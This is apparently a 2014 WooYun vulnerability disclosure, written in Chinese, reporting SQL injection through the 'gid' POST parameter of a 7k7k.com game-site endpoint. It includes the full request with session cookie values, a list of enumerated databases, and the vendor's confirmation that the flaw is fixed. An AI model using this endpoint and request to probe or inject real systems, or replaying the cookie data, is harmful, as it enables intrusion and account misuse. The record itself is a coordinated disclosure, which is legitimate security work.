漏洞详情

披露状态:

2014-03-13: 细节已通知厂商并且等待厂商处理中
2014-03-14: 厂商已经确认,细节仅向厂商公开
2014-03-24: 细节向核心白帽子及相关领域专家公开
2014-04-03: 细节向普通白帽子公开
2014-04-13: 细节向实习白帽子公开
2014-04-27: 细节向公众公开

简要描述:

RT

详细说明:

相关页面:

http://web.7k7k.com/source/cms/newServer.php

post参数:gid

post包:

POST /source/cms/newServer.php HTTP/1.1
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://web.7k7k.com:80/
Cookie: PHPSESSID=qt88ga5hqc6pttdclihba904m6; timekey=dbedc8b5bd73801fa7e49e8312f358d7; username=cdqmvdsw; identity=cdqmvdsw; nickname=196505246; userid=483938663; kk=196505246; logintime=1394680619; k7_lastlogin=1394681640; loginfrom=0011; avatar=http%3A%2F%2Fsface.7k7kimg.cn%2Fuicons%2Fphoto_default_s.png; securitycode=3c91523a8ca0e001c4606e9353ea5cdc; k7_lastlogin=2014-03-13+11%3A16%3A59; web_uniques=482237872; k7_gamekey=%5B%2221_1%22%2C%2221_12%22%5D; k7_gamelist=%5B%7B%22sname%22%3A%22%5Cu5929%5Cu5730%5Cu82f1%5Cu96c4%5B%5Cu53cc%5Cu7ebf%5Cu4e00%5Cu533a%5D%22%2C%22key%22%3A%22tdyx%22%2C%22gid%22%3A21%2C%22server_id%22%3A%221%22%7D%2C%7B%22sname%22%3A%22%5Cu5929%5Cu5730%5Cu82f1%5Cu96c4%5B%5Cu53cc%5Cu7ebf12%5Cu533a%5D%22%2C%22key%22%3A%22tdyx%22%2C%22gid%22%3A21%2C%22server_id%22%3A%2212%22%7D%5D; yourplayedwebgames=dcj%257C%25E9%25BE%2599%25E7%25BA%25B9%25E6%2588%2598%25E5%259F%259F%252Chp2%257C%25E7%2594%25BB%25E7%259A%25AE2%252Csq%257C%25E7%25A5%259E%25E6%259B%25B2%252Cqjll%257C%25E5%25A5%2587%25E8%25BF%25B9%25E6%259D%25A5%25E4%25BA%2586%252Csctx%257C%25E7%25A5%259E%25E5%2588%259B%25E5%25A4%25A9%25E4%25B8%258B%252Ctdyx%257C%25E5%25A4%25A9%25E5%259C%25B0%25E8%258B%25B1%25E9%259B%2584
Host: web.7k7k.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

gid=7



成功注入:

GID.png



跑出的数据库:

available databases [2]:

[*] information_schema

[*] web7k

web7k的表:[221 tables]

.png



表就不列了,保护厂商,点到为止,呼呼

漏洞证明:

如上

修复方案:

过滤参数

版权声明:转载请注明来源 chopper@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-03-14 13:48

厂商回复:

感谢白帽作者反馈,确实有此漏洞,已修复,之后联系作者发送小礼物,希望和白帽人员进行合作

最新状态:

暂无


漏洞评价: